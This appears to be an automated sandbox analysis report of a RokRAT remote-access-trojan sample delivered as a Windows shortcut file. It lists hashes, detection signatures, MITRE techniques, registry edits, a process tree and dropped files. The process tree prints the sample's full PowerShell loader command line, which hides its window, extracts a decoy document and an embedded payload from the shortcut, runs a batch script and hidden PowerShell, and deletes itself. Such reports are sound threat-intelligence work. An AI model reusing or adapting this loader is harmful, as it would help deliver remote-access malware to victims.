rokrat | 53ea99f463412c04f4e1f8116c6b7b76132f44600511e36b702855c1dfefcb98

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
26-02-2024 04:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mal.lnk
Size

221.4MB
MD5

5f6682ad9da4590cba106e2f1a8cbe26
SHA1

7043c7c101532df47c832ce5270745dd3d1e8c08
SHA256

dbd5d662cc53d4b91cf7da9979cdffd1b4f702323bb9ec4114371bc6f4f0d4a6
SHA512

e744d1b0cf232c4cf224cd1413b13e41889692e2d1f29e948fe8d4a5cb1304bca9a7b5de9c34db98c8eb7440761d5233bc5ac6a4fe75de2d4009a06f318c1d35
SSDEEP

24576:P0sde6UvoEkUnigRXTTYdy830QtO0oIJjW7sFAc1Mh5l2yf:Mz6UvRXigjbaJa7f2yf

Score

10^/10

rokrat rat

Malware Config

Signatures

Detect Rokrat payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2496-165-0x000000000C060000-0x000000000C143000-memory.dmp	family_rokrat
behavioral1/memory/2496-166-0x000000000C060000-0x000000000C143000-memory.dmp	family_rokrat

Rokrat
Rokrat is a remote access trojan written in c++.
rat rokrat
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

4 2496 powershell.exe
6 2496 powershell.exe
8 2496 powershell.exe
9 2496 powershell.exe
11 2496 powershell.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

powershell.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2684 powershell.exe
Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\26033.dat powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	2496	powershell.exe
6	2496	powershell.exe
8	2496	powershell.exe
9	2496	powershell.exe
11	2496	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	powershell.exe

pid	process
2684	powershell.exe

description	ioc	process
File created	C:\Windows\26033.dat	powershell.exe

Modifies registry class 9 IoCs

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_Classes\Local Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.hwp\ = "hwp_auto_file"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.hwp	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read\command	rundll32.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

cmd.exe

pid process

2636 cmd.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2684 powershell.exe
2496 powershell.exe
2496 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

2976 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2684 powershell.exe
Token: SeDebugPrivilege 2496 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

AcroRd32.exe

pid process

2976 AcroRd32.exe
2976 AcroRd32.exe

pid	process
2636	cmd.exe

pid	process
2684	powershell.exe
2496	powershell.exe
2496	powershell.exe

pid	process
2976	AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe

pid	process
2976	AcroRd32.exe
2976	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.execsc.exerundll32.execmd.exepowershell.execsc.execsc.execsc.exe

description	pid	process	target process
PID 320 wrote to memory of 2636	320	cmd.exe	cmd.exe
PID 320 wrote to memory of 2636	320	cmd.exe	cmd.exe
PID 320 wrote to memory of 2636	320	cmd.exe	cmd.exe
PID 320 wrote to memory of 2636	320	cmd.exe	cmd.exe
PID 2636 wrote to memory of 2648	2636	cmd.exe	cmd.exe
PID 2636 wrote to memory of 2648	2636	cmd.exe	cmd.exe
PID 2636 wrote to memory of 2648	2636	cmd.exe	cmd.exe
PID 2636 wrote to memory of 2648	2636	cmd.exe	cmd.exe
PID 2636 wrote to memory of 2684	2636	cmd.exe	powershell.exe
PID 2636 wrote to memory of 2684	2636	cmd.exe	powershell.exe
PID 2636 wrote to memory of 2684	2636	cmd.exe	powershell.exe
PID 2636 wrote to memory of 2684	2636	cmd.exe	powershell.exe
PID 2684 wrote to memory of 2964	2684	powershell.exe	csc.exe
PID 2684 wrote to memory of 2964	2684	powershell.exe	csc.exe
PID 2684 wrote to memory of 2964	2684	powershell.exe	csc.exe
PID 2684 wrote to memory of 2964	2684	powershell.exe	csc.exe
PID 2964 wrote to memory of 2604	2964	csc.exe	cvtres.exe
PID 2964 wrote to memory of 2604	2964	csc.exe	cvtres.exe
PID 2964 wrote to memory of 2604	2964	csc.exe	cvtres.exe
PID 2964 wrote to memory of 2604	2964	csc.exe	cvtres.exe
PID 2684 wrote to memory of 2480	2684	powershell.exe	rundll32.exe
PID 2684 wrote to memory of 2480	2684	powershell.exe	rundll32.exe
PID 2684 wrote to memory of 2480	2684	powershell.exe	rundll32.exe
PID 2684 wrote to memory of 2480	2684	powershell.exe	rundll32.exe
PID 2684 wrote to memory of 2480	2684	powershell.exe	rundll32.exe
PID 2684 wrote to memory of 2480	2684	powershell.exe	rundll32.exe
PID 2684 wrote to memory of 2480	2684	powershell.exe	rundll32.exe
PID 2480 wrote to memory of 2976	2480	rundll32.exe	AcroRd32.exe
PID 2480 wrote to memory of 2976	2480	rundll32.exe	AcroRd32.exe
PID 2480 wrote to memory of 2976	2480	rundll32.exe	AcroRd32.exe
PID 2480 wrote to memory of 2976	2480	rundll32.exe	AcroRd32.exe
PID 2684 wrote to memory of 1100	2684	powershell.exe	cmd.exe
PID 2684 wrote to memory of 1100	2684	powershell.exe	cmd.exe
PID 2684 wrote to memory of 1100	2684	powershell.exe	cmd.exe
PID 2684 wrote to memory of 1100	2684	powershell.exe	cmd.exe
PID 1100 wrote to memory of 2496	1100	cmd.exe	powershell.exe
PID 1100 wrote to memory of 2496	1100	cmd.exe	powershell.exe
PID 1100 wrote to memory of 2496	1100	cmd.exe	powershell.exe
PID 1100 wrote to memory of 2496	1100	cmd.exe	powershell.exe
PID 2496 wrote to memory of 2804	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 2804	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 2804	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 2804	2496	powershell.exe	csc.exe
PID 2804 wrote to memory of 2060	2804	csc.exe	cvtres.exe
PID 2804 wrote to memory of 2060	2804	csc.exe	cvtres.exe
PID 2804 wrote to memory of 2060	2804	csc.exe	cvtres.exe
PID 2804 wrote to memory of 2060	2804	csc.exe	cvtres.exe
PID 2496 wrote to memory of 1204	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 1204	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 1204	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 1204	2496	powershell.exe	csc.exe
PID 1204 wrote to memory of 580	1204	csc.exe	cvtres.exe
PID 1204 wrote to memory of 580	1204	csc.exe	cvtres.exe
PID 1204 wrote to memory of 580	1204	csc.exe	cvtres.exe
PID 1204 wrote to memory of 580	1204	csc.exe	cvtres.exe
PID 2496 wrote to memory of 1532	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 1532	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 1532	2496	powershell.exe	csc.exe
PID 2496 wrote to memory of 1532	2496	powershell.exe	csc.exe
PID 1532 wrote to memory of 2160	1532	csc.exe	cvtres.exe
PID 1532 wrote to memory of 2160	1532	csc.exe	cvtres.exe
PID 1532 wrote to memory of 2160	1532	csc.exe	cvtres.exe
PID 1532 wrote to memory of 2160	1532	csc.exe	cvtres.exe
PID 2496 wrote to memory of 340	2496	powershell.exe	csc.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\mal.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
3⤵
PID:2648

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
3⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\py4ddipt.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71A8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7178.tmp"
5⤵
PID:2604

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\mal.hwp
4⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2480

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\mal.hwp"
5⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
5⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2496

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rukl6ztm.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA22A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA229.tmp"
7⤵
PID:2060

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ukph4mqo.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA268.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA257.tmp"
7⤵
PID:580

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xknanuo7.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2C6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA2C5.tmp"
7⤵
PID:2160

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xkecb7mp.cmdline"
6⤵
PID:340

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3A0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA39F.tmp"
7⤵
PID:1592

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabCEA7.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES71A8.tmp
Filesize
1KB

MD5
409816885c25d71f3965d42eedab5ffe

SHA1
7c59fd7bcdc9d37333e32bad21d37eaea28c3a3d

SHA256
a83f2640a02d41d838d0e2f0a709456db084782e4582fed1f1147055d22fc25f

SHA512
9e4c0072c2564a32020f7b4840fb129f31df82bab527e68e9695add85911155f9a612c5127c266b7ef2f4d23523f4ef8cd33a3de29f50de1fe965634ccbba29e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA22A.tmp
Filesize
1KB

MD5
27c7bf5011abb63ea18688a6168afac2

SHA1
384d1409881f57cd76d6699e13da3cf4dd3afc8f

SHA256
71deb1fec7edba7df7c2ade5ccd3290c4d30fedf11a9b5625cd1fd9ba85a3c3e

SHA512
0d964dac83c15e9702930be21b1240ffb03a52b1a89679c8fff057483487787222c81e2ecbaff9b9491fb62ff3d0531c7b1176e2587f54649d4983f7f3ccb662

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA268.tmp
Filesize
1KB

MD5
6e59f905406a4d0f207efaa581516c46

SHA1
831733acd6f90df97f42ec831805efc1a2f57455

SHA256
106b0e1c5604ec3c9416dab648004f5e48287234dfa1278164f336dcb5688337

SHA512
be328db64aa1576024e73417c3267bb56c9d9e0f0f6cd85e69cc04ddd14125d3980512e61c8a6573b89f952620121d3677e5839310a313203ab2d4860ebcb632

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA2C6.tmp
Filesize
1KB

MD5
99dbd37d0a5613d131ab4ecf7e787efd

SHA1
8faed77f6059034bda2ccf3c09f3a88cea3af4fe

SHA256
500797ce85a708f7e19ee3478caa006524ee29f836522534c64b52167ca7a19d

SHA512
0e914adb4ae3420223ebf2dc0e49b35a8c02ad2875a76203a134edf32acaf31fc81b71e8df9065dfff5efa04926462a4e29417aa4c9d3ba6713351fc31042cae

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA3A0.tmp
Filesize
1KB

MD5
6bffc66eafb1538b5b8245bbad89efab

SHA1
8f31d6c1d5acc8613a42ed6383afa419a698633f

SHA256
11d800c6587e4119b32e9445956aa690fe1a6e22eb4115ef6e4c0d86764ace4f

SHA512
1f97c4226635ccf30d44ed34068841099d92e4ca2a11381465d117cda06c50dcdd9c8699084a83acc969645ae2ccf6860e3d2f5c6a65dceb5429aed27c32eddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarCF26.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\mal.hwp
Filesize
267KB

MD5
d2a9da30bf1718349123ec813d055648

SHA1
5c5cd6f2461800adab4b1ab485fb49d9eebc4ab4

SHA256
653202d94d655f9fafbb1217fba57d23f30a7e3ed7fe3272f237ec21e0731126

SHA512
e3e9e526d6dc4544b460ca729383245e0298133fdcdf673fbad43f77dee2ed06ae592c1f55a6640bdf0791bf14a7424039b97f944f34e319525c0149bcf952cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\py4ddipt.dll
Filesize
3KB

MD5
a4b7364583a6401a7dc0832a099a51bf

SHA1
3fa84d659351ef6549140b07a1f935203a18ced1

SHA256
be325a7510fd878b022f4e1b442eb20095424a648076a4dc265720cf3ec88532

SHA512
10b83e5957cb7ad0c2f1f5b6ddf91c51fa3df73feae2aa0cc72b5f8e1e225787eb0e035daa6582a90461261f4e73b4cec8586a6c0285770b0f8c8b94c7f46b5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\py4ddipt.pdb
Filesize
7KB

MD5
1b2ef87687664ef36c5be37fc697340a

SHA1
96238ab8777d693907df9bf2f430491a49c240d6

SHA256
c38f5004a5b75e22555d4b155fcd4c7359bdd6b41ce829440ccae5771e4d9c3a

SHA512
565cfa12b4cf62735ee8eda054b590700f12dfba7d58f9539697d91354462b05b551038f402be63ad13e68a89c9b9bb5c030ddea90bfe1081bcdc5667e0d4bb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\rukl6ztm.dll
Filesize
3KB

MD5
a66fa0827815f5b0419aca05b32f7b8b

SHA1
ab6fa56b7d5b6a79829e4766c3d79a5e22fcc168

SHA256
4b7dd8fe58dc437a20bc696bd3f8b39a92fbd0fa80df6947439ea801b912468c

SHA512
4d37843ab228e4cd1bcb1d7ca776777c2f77f963ff2e2ae6e3b6c4add90bc7b342b982ebdbee7c1b58b3b7d8ee83032bd72eb5440b2759c89f71b365d1b5e74f

Download Submit
C:\Users\Admin\AppData\Local\Temp\rukl6ztm.pdb
Filesize
7KB

MD5
3981326b7b1dfa1e813dc947d5f01305

SHA1
49e33a19cb97890297ed7e6bfd84db220ac7391a

SHA256
7369e15a9b598b26ff7445e40318079903f7c94963bd6050c41d093ce6bac701

SHA512
c9123c59fa5f1b0f609dea74fa4ef17ffec97689ee7e6a5fe2178ba20dc2291d945eeece06f2d0119f128df88a8aa371c7da7de9aa5d0f8cd379513c35caf3c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.dat
Filesize
1KB

MD5
78480139d86520ba82766c5b3c9a7479

SHA1
436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a

SHA256
85438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c

SHA512
bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ukph4mqo.dll
Filesize
3KB

MD5
9b2819e5439edb5ffe7d4e13f66c3ccc

SHA1
8aca0fdb4041e80b5fa2e08478af3c006bf0aea5

SHA256
cf48adda3100b27720a3a2b7c9a606b6f862ad87c2e938de85bc97902a121e1b

SHA512
97940e8ac5b729cc2e117a993e76d99c3c9a8b75966a8d1a65be338519a433f9bb39bdefd319200ae6d48459ab608138ed3aec5a89c9698b5e4f0f502d090456

Download Submit
C:\Users\Admin\AppData\Local\Temp\ukph4mqo.pdb
Filesize
7KB

MD5
6bf2b6f9429c1a59a06030368507e73f

SHA1
83c037906f4b25b028d1f9929dfc7ba4f0ecc6d1

SHA256
b537c3dce5de42d7d5375ca307d62c469da4198b8a41797c2650fe9059e51d60

SHA512
58ebef400326ead45634aeabf53f4e366fb6020886a652bf4a7d8f91f1f213e04c30633e4c01a01ca2ab508fd971303bfa86c13e29f2d619b5eb72f6d91d599f

Download Submit
C:\Users\Admin\AppData\Local\Temp\working.bat
Filesize
311B

MD5
a1640eb8f424ebe13b94955f8d0f6843

SHA1
8551e56c3e19861dbcae87f83b6d0ab225c3793d

SHA256
6c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399

SHA512
6b40b95ac1979a81ed44f991375dc94fda64b872c79c18111d72210a24867811d925acae4b87d378bd9f1adc86cb9adcf359ff873be7e4579869bd7418d466c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\xkecb7mp.dll
Filesize
3KB

MD5
57c537bef22aae0d5c5c6f0243ca06c7

SHA1
25f9d045a5d4569006d9bb37312d21d1cb9d7831

SHA256
cd4a56ddee939b9399f0a2f3faabf7ddd8187694b612ed430985eec65f9bf62d

SHA512
dc6794cbabae9dd3e6f8b1eab9fa2b8de398ae0996f265012b7367beb2835550644701c1784a6af06be4742356149e01d4f6e0b16475de77af2746b3571cf65e

Download Submit
C:\Users\Admin\AppData\Local\Temp\xkecb7mp.pdb
Filesize
7KB

MD5
db2cdd624e830b3206e25ac4bc59853a

SHA1
c49dd4057a0efd54762b16b9d3c1664bd16dcec6

SHA256
ae5658eaa7b983d14403233a955127f2d967f5e77714b8d87438a24f8f010f0e

SHA512
ac82bb96e8dbc8c1e2fe090fae53572191f2b04ee65ed4cd456eef2c58765441cf0bd7e5176281022764a9c1238c78605e9cfce93c35d5d9ee2bf6fbd457aeca

Download Submit
C:\Users\Admin\AppData\Local\Temp\xknanuo7.dll
Filesize
3KB

MD5
575ab5df23e130b4d0f25034059f87cd

SHA1
d98c6ee2e10bc8b26df6b4e697c2ec9fec6f8da2

SHA256
99b23aef8aa7a372d2518153e73b6998bdf5c9ad5bd33ba21d440ce1d625622d

SHA512
d8c121621e45c827cf7e412c5793bb1946612817717696a91b661994426f8105c3024ac6e82b90b377d6dce4257e1fec3d0380b90bbe9266cefc57e1f25908de

Download Submit
C:\Users\Admin\AppData\Local\Temp\xknanuo7.pdb
Filesize
7KB

MD5
8b14b1d8233eee0827a500493c3fcfc0

SHA1
15f3cdf6a47abb11ed5a92c31f40cc1b847c6fab

SHA256
3a9284e06052baae6196dca9765746949731cc9c328026a191fce5383b3fbad7

SHA512
1d5d96d99f0643c01f4a987d9b4bb90278bd696e93095d8efafa3da06d08aeb1108d6d8ba7d78f29d0d504f62f21cc9d014ec6c4161bb74c3bdbf694c7f30e0e

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
Filesize
3KB

MD5
55ee6264f8d6281b8529d2083f001b1b
